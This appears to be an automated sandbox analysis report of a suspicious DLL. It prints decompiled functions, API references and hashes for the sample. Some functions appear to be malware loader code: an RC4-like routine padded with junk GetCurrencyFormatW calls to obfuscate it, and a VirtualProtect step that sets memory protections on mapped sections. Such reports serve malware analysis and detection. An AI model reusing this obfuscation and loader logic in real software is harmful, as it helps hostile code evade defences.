Source File: 00000000.00000002.261026626.0000000010001000.00000020.00000001.01000000.00000005.sdmp, Offset: 10000000, based on PE: true

Associated: 00000000.00000002.261016412.0000000010000000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000000.00000002.261059914.0000000010036000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000000.00000002.261070847.0000000010044000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000000.00000002.261084766.0000000010048000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000000.00000002.261094429.000000001004B000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000000.00000002.261123235.0000000010071000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000000.00000002.261144537.000000001007F000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000000.00000002.261192986.0000000010082000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000000.00000002.261207792.0000000010090000.00000002.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_10000000_loaddll32.jbxd

Similarity

API ID: CurrencyFormat
String ID: ($eofgerDSQWzbxberfjXFSqwaKLIOrtyZD$xadqsavcbdfewescGADW
API String ID: 3383288267-2712681272
Opcode ID: 6358d7462f08fcbe04848fd00b87f20519dc6db130516a4512fa2fb5f1ed022f
Instruction ID: be84b0d19bb5b2932066f15e7eca2fa00d7c74bd76f66a19a1550838f82622ea
Opcode Fuzzy Hash: 6358d7462f08fcbe04848fd00b87f20519dc6db130516a4512fa2fb5f1ed022f
Instruction Fuzzy Hash: 06428BB1604215BFE314DB91CD82FA7BFACEB8B788F024409F705DB292D771E8548A65

Uniqueness

Uniqueness Score: -1.00%

Function 100018D8 Relevance: 28.2, APIs: 14, Strings: 2, Instructions: 194
COMMONLIBRARYCODE

Download Yara Rule

Control-flow Graph

Executed
Not Executed

C-Code - Quality: 87%

			E100018D8(signed int _a4, signed int _a8, signed int _a12, intOrPtr _a16, intOrPtr _a20, signed int _a24) {
				intOrPtr* _v4;
				void* _v8;
				int _v12;
				void* _t78;
				signed int _t89;
				signed int _t111;
				signed int _t116;
				signed int _t117;
				signed int _t120;
				int _t129;
				short* _t159;

				_t129 = 0x22b9;
				_t159 = L"eofgerDSQWzbxberfjXFSqwaKLIOrtyZD";
				_v12 = 0;
				_a8 = _a4 - _a12 + _a8;
				_t78 = malloc(GetCurrencyFormatW(0, 0x11d4, _t159, 0, L"xadqsavcbdfewescGADW", 0x22b9) * _a8 *  *0x100440d0 + 0x4708); // executed
				_v8 = _t78;
				_a12 = 0;
				if(GetCurrencyFormatW(0, 0x11d4, _t159, 0, L"xadqsavcbdfewescGADW", 0x22b9) * _a8 *  *0x100440e0 + 0x4708 > 0) {
					do {
						_t116 = GetCurrencyFormatW(0, 0x11d4, _t159, 0, L"xadqsavcbdfewescGADW", _t129);
						_t117 = _a12;
						 *(_t116 * _a8 *  *0x100440d0 + _t117 + _a16) = _t117;
						_a4 = _t117 % _a24;
						_t120 = GetCurrencyFormatW(0, 0x11d4, _t159, 0, L"xadqsavcbdfewescGADW", _t129);
						_t129 = 0x22b9;
						 *((char*)(_v8 + _t120 * _a8 *  *0x100440d8 + _a12)) =  *((intOrPtr*)(_a4 + _a20));
						GetCurrencyFormatW(0, 0x11d4, _t159, 0, L"xadqsavcbdfewescGADW", 0x22b9);
						_a12 = _a12 + 1;
					} while (_a12 < GetCurrencyFormatW(0, 0x11d4, _t159, 0, L"xadqsavcbdfewescGADW", 0x22b9) * _a8 *  *0x100440e0 + 0x4708);
				}
				_a12 = _a12 & 0x00000000;
				do {
					_a4 =  *((char*)(_v8 + GetCurrencyFormatW(0, 0x11d4, _t159, 0, L"xadqsavcbdfewescGADW", _t129) * _a8 *  *0x100440d4 + _a12));
					_t89 = GetCurrencyFormatW(0, 0x11d4, _t159, 0, L"xadqsavcbdfewescGADW", _t129);
					asm("cdq");
					_v12 = (( *(_t89 * _a8 *  *0x100440d8 + _a12 + _a16) & 0x000000ff) + _a4 + _v12) % 0x4708;
					_a4 =  *((intOrPtr*)(GetCurrencyFormatW(0, 0x11d4, _t159, 0, L"xadqsavcbdfewescGADW", _t129) * _a8 *  *0x100440e0 + _a12 + _a16));
					_v4 = GetCurrencyFormatW(0, 0x11d4, _t159, 0, L"xadqsavcbdfewescGADW", _t129) * _a8 *  *0x100440e0 + _v12 + _a16;
					 *((char*)(GetCurrencyFormatW(0, 0x11d4, _t159, 0, L"xadqsavcbdfewescGADW", _t129) * _a8 *  *0x100440d0 + _a12 + _a16)) =  *_v4;
					_t111 = GetCurrencyFormatW(0, 0x11d4, _t159, 0, L"xadqsavcbdfewescGADW", _t129);
					_a12 = _a12 + 1;
					 *((char*)(_t111 * _a8 *  *0x100440dc + _v12 + _a16)) = _a4;
				} while (_a12 < 0x4708);
				return  *0x10046a64(_v8);
			}

0x100018f1
0x100018ff
0x1000190e
0x10001912
0x1000192a
0x10001937
0x10001941
0x1000195a
0x10001960
0x1000196c
0x10001980
0x10001986
0x1000199d
0x100019a1
0x100019c2
0x100019d3
0x100019d6
0x100019d8
0x100019fb
0x10001960
0x10001a05
0x10001a0a
0x10001a3c
0x10001a40
0x10001a68
0x10001a76
0x10001a9f
0x10001ac5
0x10001af1
0x10001af4
0x10001b0a
0x10001b1a
0x10001b1a
0x10001b35

APIs

GetCurrencyFormatW.KERNEL32 ref: 10001916
malloc.MSVCRT ref: 1000192A
GetCurrencyFormatW.KERNEL32 ref: 10001945
GetCurrencyFormatW.KERNEL32 ref: 1000196C
GetCurrencyFormatW.KERNEL32 ref: 100019A1
GetCurrencyFormatW.KERNEL32 ref: 100019D6
GetCurrencyFormatW.KERNEL32 ref: 100019E8
GetCurrencyFormatW.KERNEL32 ref: 10001A16
GetCurrencyFormatW.KERNEL32 ref: 10001A40
GetCurrencyFormatW.KERNEL32 ref: 10001A7A
GetCurrencyFormatW.KERNEL32 ref: 10001AA3
GetCurrencyFormatW.KERNEL32 ref: 10001AC9
GetCurrencyFormatW.KERNEL32 ref: 10001AF4
??3@YAXPAX@Z.MSVCRT ref: 10001B27

Strings

xadqsavcbdfewescGADW, xrefs: 100018F7, 10001932, 10001961, 10001990, 100019C8, 100019DD, 10001A0B, 10001A31, 10001A6B, 10001A94, 10001ABA, 10001AE6
eofgerDSQWzbxberfjXFSqwaKLIOrtyZD, xrefs: 100018FF, 10001904, 1000193E, 10001968, 10001997, 100019CF, 100019E4, 10001A12, 10001A38, 10001A72, 10001A9B, 10001AC1, 10001AED

Memory Dump Source

Source File: 00000000.00000002.261026626.0000000010001000.00000020.00000001.01000000.00000005.sdmp, Offset: 10000000, based on PE: true

Associated: 00000000.00000002.261016412.0000000010000000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000000.00000002.261059914.0000000010036000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000000.00000002.261070847.0000000010044000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000000.00000002.261084766.0000000010048000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000000.00000002.261094429.000000001004B000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000000.00000002.261123235.0000000010071000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000000.00000002.261144537.000000001007F000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000000.00000002.261192986.0000000010082000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000000.00000002.261207792.0000000010090000.00000002.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_10000000_loaddll32.jbxd

Similarity

API ID: CurrencyFormat$??3@malloc
String ID: eofgerDSQWzbxberfjXFSqwaKLIOrtyZD$xadqsavcbdfewescGADW
API String ID: 203256951-3161301136
Opcode ID: a0604d6b19201fa23fe871278798098373fce57cb70cfb09eb1f26b7c660e828
Instruction ID: fba73ffc0b4bb754e4a8c3637f8b73e63a87aae8de5c3fee8d95280e19d6a203
Opcode Fuzzy Hash: a0604d6b19201fa23fe871278798098373fce57cb70cfb09eb1f26b7c660e828
Instruction Fuzzy Hash: 9F615A71508350AFE304DB11CD91F5BBFE9EBCA748F05590EF684AB2A1C731EA148E26

Uniqueness

Uniqueness Score: -1.00%

Function 1000227A Relevance: 22.9, APIs: 11, Strings: 2, Instructions: 172
COMMONLIBRARYCODE

Download Yara Rule

Control-flow Graph

Executed
Not Executed

C-Code - Quality: 85%

			E1000227A(void** __ebx, intOrPtr* _a4) {
				signed int _v8;
				signed int _t47;
				signed int _t48;
				signed int _t49;
				signed int _t60;
				signed int _t66;
				signed int _t68;
				int _t74;
				void** _t84;
				short* _t103;
				void* _t119;

				_t84 = __ebx;
				if(__ebx[2] != 0) {
					_t106 = 0x22b9;
					if((__ebx[3] & GetCurrencyFormatW(0, 0x11d4, L"eofgerDSQWzbxberfjXFSqwaKLIOrtyZD", 0, L"xadqsavcbdfewescGADW", 0x22b9) *  *0x100440e0 + 0x02000000) == 0) {
						_t47 = GetCurrencyFormatW(0, 0x11d4, L"eofgerDSQWzbxberfjXFSqwaKLIOrtyZD", 0, L"xadqsavcbdfewescGADW", 0x22b9);
						asm("sbb esi, esi");
						_t48 = GetCurrencyFormatW(0, 0x11d4, L"eofgerDSQWzbxberfjXFSqwaKLIOrtyZD", 0, L"xadqsavcbdfewescGADW", 0x22b9);
						asm("sbb edi, edi");
						_t49 = GetCurrencyFormatW(0, 0x11d4, L"eofgerDSQWzbxberfjXFSqwaKLIOrtyZD", 0, L"xadqsavcbdfewescGADW", 0x22b9);
						asm("sbb eax, eax");
						_t103 = L"eofgerDSQWzbxberfjXFSqwaKLIOrtyZD";
						_v8 =  *((intOrPtr*)(0x10046a90 + ( ~( ~(_t49 *  *0x100440e0 - 0x80000000 & __ebx[3])) + ( ~( ~(_t48 *  *0x100440e0 + 0x40000000 & __ebx[3])) +  ~( ~(_t47 *  *0x100440d4 + 0x20000000 & __ebx[3])) * 2) * 2) * 4));
						if((__ebx[3] & GetCurrencyFormatW(0, 0x11d4, _t103, 0, L"xadqsavcbdfewescGADW", 0x22b9) *  *0x100440e0 + 0x04000000) != 0) {
							_v8 = _v8 | GetCurrencyFormatW(0, 0x11d4, _t103, 0, L"xadqsavcbdfewescGADW", 0x22b9) *  *0x100440d0 + 0x00000200;
						}
						_t60 = GetCurrencyFormatW(0, 0x11d4, _t103, 0, L"xadqsavcbdfewescGADW", 0x22b9);
						_t66 = VirtualProtect( *_t84, _t84[2] + GetCurrencyFormatW(0, 0x11d4, _t103, 0, L"xadqsavcbdfewescGADW", 0x22b9) *  *0x100440e0, _v8, _t119 + 0x10 + _t60 *  *0x100440d8 * 4); // executed
						asm("sbb eax, eax");
						_t68 =  ~( ~_t66);
						L13:
						return _t68;
					}
					if( *__ebx != __ebx[1]) {
						L9:
						_t68 = 1;
						goto L13;
					}
					_t74 = 0;
					if(__ebx[4] != 0 ||  *((intOrPtr*)( *_a4 + 0x38)) ==  *(_a4 + 0x3c)) {
						L8:
						 *((intOrPtr*)(_a4 + 0x20))( *_t84, _t84[2], GetCurrencyFormatW(_t74, 0x11d4, L"eofgerDSQWzbxberfjXFSqwaKLIOrtyZD", _t74, L"xadqsavcbdfewescGADW", _t106) *  *0x100440e0 + 0x4000,  *((intOrPtr*)(_a4 + 0x34)));
						goto L9;
					} else {
						if(GetCurrencyFormatW(0, 0x11d4, L"eofgerDSQWzbxberfjXFSqwaKLIOrtyZD", 0, L"xadqsavcbdfewescGADW", 0x22b9) *  *0x100440e0 + __ebx[2] %  *(_a4 + 0x3c) != 0) {
							goto L9;
						}
						_t106 = 0x22b9;
						_t74 = 0;
						goto L8;
					}
				}
				return 1;
			}

0x1000227a
0x10002281
0x10002292
0x100022bb
0x10002358
0x10002380
0x10002386
0x100023b2
0x100023b8
0x100023d5
0x100023de
0x100023f6
0x1000240b
0x1000242b
0x1000242b
0x1000243f
0x10002470
0x10002478
0x1000247a
0x1000247c
0x00000000
0x1000247e
0x100022c6
0x10002340
0x10002342
0x00000000
0x10002342
0x100022c8
0x100022cd
0x1000230d
0x1000233a
0x00000000
0x100022dd
0x10002304
0x00000000
0x00000000
0x10002306
0x1000230b
0x00000000
0x1000230b
0x100022cd
0x00000000

APIs

GetCurrencyFormatW.KERNEL32 ref: 100022AA
GetCurrencyFormatW.KERNEL32 ref: 100022EB
GetCurrencyFormatW.KERNEL32 ref: 10002322

Strings

xadqsavcbdfewescGADW, xrefs: 10002298, 100022DE, 10002315, 10002349, 10002368, 10002396, 100023D0, 10002412, 10002434, 10002456
eofgerDSQWzbxberfjXFSqwaKLIOrtyZD, xrefs: 10002289, 1000229E, 100022E4, 1000231B, 10002350, 10002378, 100023A6, 100023DE, 100023E3, 10002419, 1000243B, 1000245D

Memory Dump Source

Source File: 00000000.00000002.261026626.0000000010001000.00000020.00000001.01000000.00000005.sdmp, Offset: 10000000, based on PE: true

Associated: 00000000.00000002.261016412.0000000010000000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000000.00000002.261059914.0000000010036000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000000.00000002.261070847.0000000010044000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000000.00000002.261084766.0000000010048000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000000.00000002.261094429.000000001004B000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000000.00000002.261123235.0000000010071000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000000.00000002.261144537.000000001007F000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000000.00000002.261192986.0000000010082000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000000.00000002.261207792.0000000010090000.00000002.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_10000000_loaddll32.jbxd

Similarity

API ID: CurrencyFormat
String ID: eofgerDSQWzbxberfjXFSqwaKLIOrtyZD$xadqsavcbdfewescGADW
API String ID: 3383288267-3161301136
Opcode ID: 1879c51a0ca35df28eb5a6be710fe34797454b6d8926430bf9f23c6529057236
Instruction ID: 001e048e4435a5d91bd341ad1d3e9c5f26db428d8a62d425f6a780c80bac8da3
Opcode Fuzzy Hash: 1879c51a0ca35df28eb5a6be710fe34797454b6d8926430bf9f23c6529057236
Instruction Fuzzy Hash: E651E1726002117FE301CB50CD86F97BBA9EB8B751F158418FB06EF191D730A864CBA4

Uniqueness

Uniqueness Score: -1.00%

Function 10010763 Relevance: 16.6, APIs: 11, Instructions: 103
memoryCOMMONLIBRARYCODE

Download Yara Rule

Control-flow Graph

Executed
Not Executed

C-Code - Quality: 80%

			E10010763() {
				struct _CRITICAL_SECTION* _v4;
				char _v28;
				char _v36;
				char _v44;
				intOrPtr _v56;
				void* __ebx;
				intOrPtr __ecx;
				signed int __edi;
				void* __esi;
				void* __ebp;
				struct _CRITICAL_SECTION* _t39;
				intOrPtr _t40;
				void* _t41;
				long _t44;
				void* _t45;
				signed int* _t51;
				intOrPtr _t64;
				long _t68;
				void* _t69;
				void* _t70;
				signed int _t72;
				intOrPtr _t78;
				signed int _t82;
				void* _t86;
				signed int _t88;
				void* _t90;
				void* _t91;
				void* _t93;

				_push(_t72);
				_push(_t69);
				_push(_t88);
				_t86 = _t72;
				_t1 = _t86 + 0x1c; // 0x10048600
				_t39 = _t1;
				_v4 = _t39;
				EnterCriticalSection(_t39);
				_t3 = _t86 + 4; // 0x20
				_t40 =  *_t3;
				_t4 = _t86 + 8; // 0x3
				_t82 =  *_t4;
				if(_t82 >= _t40) {
					L7:
					_t82 = 1;
					__eflags = _t40 - 1;
					if(_t40 <= 1) {
						L12:
						_t21 = _t40 + 0x20; // 0x40
						_t88 = _t21;
						_t22 = _t86 + 0x10; // 0x154cee8
						_t41 =  *_t22;
						__eflags = _t41;
						if(__eflags != 0) {
							_t69 = GlobalHandle(_t41);
							GlobalUnlock(_t69);
							_t44 = E100010C9(_t72, __eflags, _t88, 8);
							_t72 = 0x2002;
							_t45 = GlobalReAlloc(_t69, _t44, ??);
						} else {
							_t68 = E100010C9(_t72, __eflags, _t88, 8);
							_pop(_t72);
							_t45 = GlobalAlloc(2, _t68); // executed
						}
						__eflags = _t45;
						if(_t45 != 0) {
							_t70 = GlobalLock(_t45);
							_t25 = _t86 + 4; // 0x20
							__eflags = _t88 -  *_t25 << 3;
							E10020F40(_t82, _t70 +  *_t25 * 8, 0, _t88 -  *_t25 << 3);
							 *(_t86 + 4) = _t88;
							 *(_t86 + 0x10) = _t70;
							goto L20;
						} else {
							_t23 = _t86 + 0x10; // 0x154cee8
							_t86 =  *_t23;
							__eflags = _t86;
							if(_t86 != 0) {
								GlobalLock(GlobalHandle(_t86));
							}
							LeaveCriticalSection(_v4);
							_push(_t88);
							_t90 = _t93;
							_push(_t72);
							_v28 = 0x100442e0;
							E100209E8( &_v28, 0x1003e1e4);
							asm("int3");
							_push(_t90);
							_t91 = _t93;
							_push(_t72);
							_v36 = 0x10044378;
							E100209E8( &_v36, 0x1003e298);
							asm("int3");
							_push(_t91);
							_push(_t72);
							_v44 = 0x10044410;
							E100209E8( &_v44, 0x1003e2dc);
							asm("int3");
							_push(4);
							E1001FBC4(E10032E9B, _t69, _t82, _t86);
							_t78 = E100105C8(0x104);
							_v56 = _t78;
							_t64 = 0;
							_v44 = 0;
							if(_t78 != 0) {
								_t64 = E1000E58E(_t78);
							}
							return E1001FC9C(_t64);
						}
					} else {
						_t18 = _t86 + 0x10; // 0x154cee8
						_t72 =  *_t18 + 8;
						__eflags = _t72;
						while(1) {
							__eflags =  *_t72 & 0x00000001;
							if(( *_t72 & 0x00000001) == 0) {
								break;
							}
							_t82 = _t82 + 1;
							_t72 = _t72 + 8;
							__eflags = _t82 - _t40;
							if(_t82 < _t40) {
								continue;
							}
							break;
						}
						__eflags = _t82 - _t40;
						if(_t82 < _t40) {
							goto L20;
						} else {
							goto L12;
						}
					}
				} else {
					_t13 = __esi + 0x10; // 0x154cee8
					__ecx =  *_t13;
					__eflags =  *(__ecx + __edi * 8) & 0x00000001;
					if(( *(__ecx + __edi * 8) & 0x00000001) == 0) {
						L20:
						_t30 = _t86 + 0xc; // 0x3
						__eflags = _t82 -  *_t30;
						if(_t82 >=  *_t30) {
							_t31 = _t82 + 1; // 0x4
							 *((intOrPtr*)(_t86 + 0xc)) = _t31;
						}
						_t33 = _t86 + 0x10; // 0x154cee8
						_t51 =  *_t33 + _t82 * 8;
						 *_t51 =  *_t51 | 0x00000001;
						__eflags =  *_t51;
						_t37 = _t82 + 1; // 0x4
						 *(_t86 + 8) = _t37;
						LeaveCriticalSection(_v4);
						return _t82;
					} else {
						goto L7;
					}
				}
			}

0x10010763
0x10010764
0x10010765
0x10010767
0x10010769
0x10010769
0x1001076e
0x10010772
0x10010778
0x10010778
0x1001077b
0x1001077b
0x10010780
0x1001078f
0x10010791
0x10010792
0x10010794
0x100107b1
0x100107b1
0x100107b1
0x100107b4
0x100107b4
0x100107b7
0x100107b9
0x100107d7
0x100107da
0x100107e8
0x100107ee
0x100107f1
0x100107bb
0x100107be
0x100107c4
0x100107c8
0x100107c8
0x100107f7
0x100107f9
0x10010826
0x10010828
0x1001082f
0x10010839
0x10010841
0x10010844
0x00000000
0x100107fb
0x100107fb
0x100107fb
0x100107fe
0x10010800
0x1001080a
0x1001080a
0x10010814
0x10004e3a
0x10004e3b
0x10004e3d
0x10004e47
0x10004e4e
0x10004e53
0x10004e54
0x10004e55
0x10004e57
0x10004e61
0x10004e68
0x10004e6d
0x10004e6e
0x10004e71
0x10004e7b
0x10004e82
0x10004e87
0x10004e88
0x10004e8f
0x10004e9e
0x10004ea0
0x10004ea3
0x10004ea7
0x10004eaa
0x10004eac
0x10004eac
0x10004eb6
0x10004eb6
0x10010796
0x10010796
0x10010799
0x10010799
0x1001079c
0x1001079c
0x1001079f
0x00000000
0x00000000
0x100107a1
0x100107a2
0x100107a5
0x100107a7
0x00000000
0x00000000
0x00000000
0x100107a7
0x100107a9
0x100107ab
0x00000000
0x00000000
0x00000000
0x00000000
0x100107ab
0x10010782
0x10010782
0x10010782
0x10010785
0x10010789
0x10010847
0x10010847
0x10010847
0x1001084a
0x1001084c
0x1001084f
0x1001084f
0x10010852
0x10010859
0x1001085c
0x1001085c
0x1001085f
0x10010862
0x10010865
0x10010872
0x00000000
0x00000000
0x00000000
0x10010789

APIs

EnterCriticalSection.KERNEL32(10048600,?,?,?,?,100485E4,10010A9E,00000004,1000EC18,10004E88,1000EC41,1000FF70,00000000,1000FFF6,00000001), ref: 10010772
GlobalAlloc.KERNELBASE(00000002,00000000,?,?,?,?,100485E4,10010A9E,00000004,1000EC18,10004E88,1000EC41,1000FF70,00000000,1000FFF6,00000001), ref: 100107C8
GlobalHandle.KERNEL32(0154CEE8), ref: 100107D1
GlobalUnlock.KERNEL32(00000000,?,?,?,?,100485E4,10010A9E,00000004,1000EC18,10004E88,1000EC41,1000FF70,00000000,1000FFF6,00000001), ref: 100107DA
GlobalReAlloc.KERNEL32 ref: 100107F1
GlobalHandle.KERNEL32(0154CEE8), ref: 10010803
GlobalLock.KERNEL32 ref: 1001080A
LeaveCriticalSection.KERNEL32(?,?,?,?,?,100485E4,10010A9E,00000004,1000EC18,10004E88,1000EC41,1000FF70,00000000,1000FFF6,00000001), ref: 10010814
GlobalLock.KERNEL32 ref: 10010820
_memset.LIBCMT ref: 10010839
LeaveCriticalSection.KERNEL32(?,00000058,10003840), ref: 10010865

Memory Dump Source

Source File: 00000000.00000002.261026626.0000000010001000.00000020.00000001.01000000.00000005.sdmp, Offset: 10000000, based on PE: true

Associated: 00000000.00000002.261016412.0000000010000000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000000.00000002.261059914.0000000010036000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000000.00000002.261070847.0000000010044000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000000.00000002.261084766.0000000010048000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000000.00000002.261094429.000000001004B000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000000.00000002.261123235.0000000010071000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000000.00000002.261144537.000000001007F000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000000.00000002.261192986.0000000010082000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000000.00000002.261207792.0000000010090000.00000002.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_10000000_loaddll32.jbxd

Similarity

API ID: Global$CriticalSection$AllocHandleLeaveLock$EnterUnlock_memset
String ID:
API String ID: 496899490-0
Opcode ID: 996242b7fcfa61bad23c73a9a116ea6815c52f49dbe0cd54541e6c2615ba2795
Instruction ID: cc07cb1ae1718158ec5411955b1f766252c932f609a865be9411df0e50f52d34
Opcode Fuzzy Hash: 996242b7fcfa61bad23c73a9a116ea6815c52f49dbe0cd54541e6c2615ba2795
Instruction Fuzzy Hash: 013180757047159FE325DF24CC88A2A77E9FF44241B01892DF9D6CB652DBB1F8848B60

Uniqueness

Uniqueness Score: -1.00%

Function 1001F6F4 Relevance: 7.5, APIs: 5, Instructions: 44
memoryCOMMONLIBRARYCODE

Download Yara Rule

Control-flow Graph

Executed
Not Executed

C-Code - Quality: 27%

			E1001F6F4(void* __ebx, void* __edi, void* __esi, void* __eflags) {
				intOrPtr* _t10;
				intOrPtr _t13;
				intOrPtr _t23;
				void* _t25;

				_push(0xc);
				_push(0x10041288);
				_t8 = E10022714(__ebx, __edi, __esi);
				_t23 =  *((intOrPtr*)(_t25 + 8));
				if(_t23 == 0) {
					L9:
					return E10022759(_t8);
				}
				if( *0x1004a564 != 3) {
					_push(_t23);
					L7:
					_push(0);
					_t8 = RtlFreeHeap( *0x10048aa4); // executed
					_t31 = _t8;
					if(_t8 == 0) {
						_t10 = E10020B71(_t31);
						 *_t10 = E10020B36(GetLastError());
					}
					goto L9;
				}
				E10023FE8(4);
				 *(_t25 - 4) =  *(_t25 - 4) & 0x00000000;
				_t13 = E10024061(_t23);
				 *((intOrPtr*)(_t25 - 0x1c)) = _t13;
				if(_t13 != 0) {
					_push(_t23);
					_push(_t13);
					E1002408C();
				}
				 *(_t25 - 4) = 0xfffffffe;
				_t8 = E1001F74A();
				if( *((intOrPtr*)(_t25 - 0x1c)) != 0) {
					goto L9;
				} else {
					_push( *((intOrPtr*)(_t25 + 8)));
					goto L7;
				}
			}

0x1001f6f4
0x1001f6f6
0x1001f6fb
0x1001f700
0x1001f705
0x1001f77c
0x1001f781
0x1001f781
0x1001f70e
0x1001f753
0x1001f754
0x1001f754
0x1001f75c
0x1001f762
0x1001f764
0x1001f766
0x1001f779
0x1001f77b
0x00000000
0x1001f764
0x1001f712
0x1001f718
0x1001f71d
0x1001f723
0x1001f728
0x1001f72a
0x1001f72b
0x1001f72c
0x1001f732
0x1001f733
0x1001f73a
0x1001f743
0x00000000
0x1001f745
0x1001f745
0x00000000
0x1001f745

APIs

__lock.LIBCMT ref: 1001F712

Part of subcall function 10023FE8: __mtinitlocknum.LIBCMT ref: 10023FFC
Part of subcall function 10023FE8: __amsg_exit.LIBCMT ref: 10024008
Part of subcall function 10023FE8: EnterCriticalSection.KERNEL32(00000001,00000001,?,10025F0B,0000000D,10041560,00000008,10025FFD,00000001,?,?,00000001,?,?,1002092A,00000001), ref: 10024010

___sbh_find_block.LIBCMT ref: 1001F71D
___sbh_free_block.LIBCMT ref: 1001F72C
RtlFreeHeap.NTDLL(00000000,?,10041288,0000000C,10025E61,00000000,?,1002692B,?,00000001,00000001,10023F72,00000018,100413C8,0000000C,10024001), ref: 1001F75C
GetLastError.KERNEL32(?,1002692B,?,00000001,00000001,10023F72,00000018,100413C8,0000000C,10024001,00000001,00000001,?,10025F0B,0000000D,10041560), ref: 1001F76D

Memory Dump Source

Source File: 00000000.00000002.261026626.0000000010001000.00000020.00000001.01000000.00000005.sdmp, Offset: 10000000, based on PE: true

Associated: 00000000.00000002.261016412.0000000010000000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000000.00000002.261059914.0000000010036000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000000.00000002.261070847.0000000010044000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000000.00000002.261084766.0000000010048000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000000.00000002.261094429.000000001004B000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000000.00000002.261123235.0000000010071000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000000.00000002.261144537.000000001007F000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000000.00000002.261192986.0000000010082000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000000.00000002.261207792.0000000010090000.00000002.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_10000000_loaddll32.jbxd

Similarity

API ID: CriticalEnterErrorFreeHeapLastSection___sbh_find_block___sbh_free_block__amsg_exit__lock__mtinitlocknum
String ID:
API String ID: 2714421763-0
Opcode ID: 76888bbc55651325260b5972d5f97c4dddcca1bfca01a2c3470237c6f9f3f0fd
Instruction ID: dcea96c0beb71c26c32ed6edefd011e4960108453953efdd22255c92b90fc265
Opcode Fuzzy Hash: 76888bbc55651325260b5972d5f97c4dddcca1bfca01a2c3470237c6f9f3f0fd
Instruction Fuzzy Hash: 3E01A235809311EAEB21EBB0AD4A75E3BA4DF05364F51421CF500EE0E1CB34D9C0CA55

Uniqueness

Uniqueness Score: -1.00%

Function 10034C48 Relevance: 7.0, APIs: 2, Strings: 2, Instructions: 39
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

C-Code - Quality: 100%

			E10034C48() {
				signed int _t1;
				intOrPtr _t6;
				short* _t7;
				short* _t10;

				_t10 = L"xadqsavcbdfewescGADW";
				_t7 = L"eofgerDSQWzbxberfjXFSqwaKLIOrtyZD";
				_t1 = GetCurrencyFormatW(0, 0x11d4, _t7, 0, _t10, 0x22b9); // executed
				 *0x10046a90 = _t1 *  *0x100440dc + 1;
				 *0x10046a94 = 8;
				 *0x10046a98 = 2;
				 *0x10046a9c = 4;
				_t6 = GetCurrencyFormatW(0, 0x11d4, _t7, 0, _t10, 0x22b9) *  *0x100440cc + 0x10;
				 *0x10046aa0 = _t6;
				 *0x10046aa4 = 0x80;
				 *0x10046aa8 = 0x20;
				 *0x10046aac = 0x40;
				return _t6;
			}

0x10034c57
0x10034c5f
0x10034c6d
0x10034c83
0x10034c88
0x10034c92
0x10034c9c
0x10034cb1
0x10034cb5
0x10034cba
0x10034cc4
0x10034cce
0x10034cd9

APIs

GetCurrencyFormatW.KERNEL32 ref: 10034C6D
GetCurrencyFormatW.KERNEL32 ref: 10034CA6

Strings

xadqsavcbdfewescGADW, xrefs: 10034C57, 10034C5C, 10034C7B
eofgerDSQWzbxberfjXFSqwaKLIOrtyZD, xrefs: 10034C5F, 10034C64

Memory Dump Source

Source File: 00000000.00000002.261026626.0000000010001000.00000020.00000001.01000000.00000005.sdmp, Offset: 10000000, based on PE: true

Associated: 00000000.00000002.261016412.0000000010000000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000000.00000002.261059914.0000000010036000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000000.00000002.261070847.0000000010044000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000000.00000002.261084766.0000000010048000.00000004.00000001.01000000.00000005.sdmpDownload File
